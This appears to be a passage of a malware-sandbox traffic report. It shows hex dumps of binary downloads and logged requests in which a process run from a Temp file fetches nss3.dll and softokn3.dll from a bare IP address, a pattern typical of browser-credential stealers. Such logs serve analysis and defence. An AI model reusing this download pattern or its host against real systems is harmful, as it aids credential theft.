b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49762	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:26 UTC	170	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-26 08:31:27 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:26 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-05-26 08:31:27 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-05-26 08:31:27 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49763	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:29 UTC	174	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-26 08:31:30 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:29 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-05-26 08:31:30 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
